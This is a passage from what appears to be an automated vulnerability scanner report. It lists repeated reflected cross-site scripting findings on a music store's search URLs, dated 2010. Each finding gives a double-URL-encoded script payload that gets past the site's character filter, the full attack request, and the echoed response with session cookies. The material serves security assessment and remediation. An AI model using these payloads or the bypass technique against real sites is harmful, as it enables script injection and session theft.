Host:   http://www.insound.com
Path:   /search/query/Blood%20Red%20Shoes&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85924%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5e30c6a4c39 was submitted in the REST URL parameter 3. This input was echoed as 85924"><script>alert(1)</script>5e30c6a4c39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Blood%20Red%20Shoes85924%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5e30c6a4c39&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=gpqs36gsgpdlk1pjrbqeu15925; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:21 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=564825777; expires=Sun, 09-Jan-2011 02:40:21 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=551243400; expires=Sun, 09-Jan-2011 02:40:21 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Blood Red Shoes85924"><script>alert(1)</script>5e30c6a4c39" />
...[SNIP]...

1.14. http://www.insound.com/search/query/Blood%20Red%20Shoes&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Blood%20Red%20Shoes&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload e7eb1%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e94572236aff was submitted in the REST URL parameter 3. This input was echoed as e7eb1</title><script>alert(1)</script>94572236aff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Blood%20Red%20Shoese7eb1%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e94572236aff&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=op9867aiqvtnnd3h7l2f9rup75; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:28 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=276676337; expires=Sun, 09-Jan-2011 02:40:28 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=96659451; expires=Sun, 09-Jan-2011 02:40:28 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Blood Red Shoese7eb1</title><script>alert(1)</script>94572236aff</title>
...[SNIP]...

1.15. http://www.insound.com/search/query/Braids&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Braids&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8d94%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec0aec05a6ed was submitted in the REST URL parameter 3. This input was echoed as e8d94"><script>alert(1)</script>c0aec05a6ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Braidse8d94%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec0aec05a6ed&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=rd54lkq30mjfs17pf5bi5ib283; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:55 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=542210751; expires=Sun, 09-Jan-2011 02:37:55 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=37649456; expires=Sun, 09-Jan-2011 02:37:55 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Braidse8d94"><script>alert(1)</script>c0aec05a6ed" />
...[SNIP]...

1.16. http://www.insound.com/search/query/Braids&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Braids&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 9b08c%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e80cca7b54 was submitted in the REST URL parameter 3. This input was echoed as 9b08c</title><script>alert(1)</script>9e80cca7b54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Braids9b08c%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e80cca7b54&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1676qfedjjs19ujp7mn2rlkjo0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:01 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=359516446; expires=Sun, 09-Jan-2011 02:38:01 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=483670689; expires=Sun, 09-Jan-2011 02:38:01 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Braids9b08c</title><script>alert(1)</script>9e80cca7b54</title>
...[SNIP]...

1.17. http://www.insound.com/search/query/Breathe%20Owl%20Breathe&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Breathe%20Owl%20Breathe&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30e12%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e15f5e9c4cda was submitted in the REST URL parameter 3. This input was echoed as 30e12"><script>alert(1)</script>15f5e9c4cda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Breathe%20Owl%20Breathe30e12%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e15f5e9c4cda&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=pkup8vl7hjj5ajgd0v76u1kh55; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:33 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=170695311; expires=Sun, 09-Jan-2011 02:40:33 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=332278604; expires=Sun, 09-Jan-2011 02:40:33 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Breathe Owl Breathe30e12"><script>alert(1)</script>15f5e9c4cda" />
...[SNIP]...

1.18. http://www.insound.com/search/query/Breathe%20Owl%20Breathe&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Breathe%20Owl%20Breathe&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload bbe5f%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4ebd0056fb9 was submitted in the REST URL parameter 3. This input was echoed as bbe5f</title><script>alert(1)</script>4ebd0056fb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Breathe%20Owl%20Breathebbe5f%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4ebd0056fb9&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=avclvskv2n84ffbsn14q7719r6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:44 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=171512412; expires=Sun, 09-Jan-2011 02:40:44 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=92034351; expires=Sun, 09-Jan-2011 02:40:44 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Breathe Owl Breathebbe5f</title><script>alert(1)</script>4ebd0056fb9</title>
...[SNIP]...

1.19. http://www.insound.com/search/query/British%20Sea%20Power&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/British%20Sea%20Power&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload c59f0%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e45e0dddf740 was submitted in the REST URL parameter 3. This input was echoed as c59f0</title><script>alert(1)</script>45e0dddf740 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/British%20Sea%20Powerc59f0%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e45e0dddf740&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=3u2hlft8dc06r39li80ipbtcc1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:48 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=129333213; expires=Sun, 09-Jan-2011 02:40:48 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=483352642; expires=Sun, 09-Jan-2011 02:40:48 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>British Sea Powerc59f0</title><script>alert(1)</script>45e0dddf740</title>
...[SNIP]...

1.20. http://www.insound.com/search/query/British%20Sea%20Power&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/British%20Sea%20Power&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 362fb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e289eede2243 was submitted in the REST URL parameter 3. This input was echoed as 362fb"><script>alert(1)</script>289eede2243 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/British%20Sea%20Power362fb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e289eede2243&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=8s0r80ua5ik1nmgrkakdaoai56; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:41 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=143145132; expires=Sun, 09-Jan-2011 02:40:41 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=61588631; expires=Sun, 09-Jan-2011 02:40:41 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="British Sea Power362fb"><script>alert(1)</script>289eede2243" />
...[SNIP]...

1.21. http://www.insound.com/search/query/CANT&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/CANT&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64f09%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef4bd9f8e33a was submitted in the REST URL parameter 3. This input was echoed as 64f09"><script>alert(1)</script>f4bd9f8e33a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/CANT64f09%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef4bd9f8e33a&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=ugbqdm83hf2jkie38eitjbo3k1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=164300682; expires=Sun, 09-Jan-2011 02:39:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=16200412; expires=Sun, 09-Jan-2011 02:39:22 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="CANT64f09"><script>alert(1)</script>f4bd9f8e33a" />
...[SNIP]...

1.22. http://www.insound.com/search/query/CANT&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/CANT&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 9303a%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4b797b7cace was submitted in the REST URL parameter 3. This input was echoed as 9303a</title><script>alert(1)</script>4b797b7cace in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/CANT9303a%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4b797b7cace&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=f5c0fduis3t5vvkhio5qbjkf81; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:29 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=95704739; expires=Sun, 09-Jan-2011 02:39:29 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=246303134; expires=Sun, 09-Jan-2011 02:39:29 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>CANT9303a</title><script>alert(1)</script>4b797b7cace</title>
...[SNIP]...

1.23. http://www.insound.com/search/query/CFCF&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/CFCF&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 92588%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e4228ca9d4 was submitted in the REST URL parameter 3. This input was echoed as 92588</title><script>alert(1)</script>1e4228ca9d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/CFCF92588%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e4228ca9d4&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=kde0f1ufvh27ets53ptvjliam7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:14 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=175246752; expires=Sun, 09-Jan-2011 02:41:14 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=374433821; expires=Sun, 09-Jan-2011 02:41:14 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>CFCF92588</title><script>alert(1)</script>1e4228ca9d4</title>
...[SNIP]...

1.24. http://www.insound.com/search/query/CFCF&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/CFCF&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f843%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e243c2d95501 was submitted in the REST URL parameter 3. This input was echoed as 5f843"><script>alert(1)</script>243c2d95501 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/CFCF5f843%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e243c2d95501&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=he6b1tjj10n25pqofggj3fqod7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:08 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=196252129; expires=Sun, 09-Jan-2011 02:41:08 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=43539892; expires=Sun, 09-Jan-2011 02:41:08 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
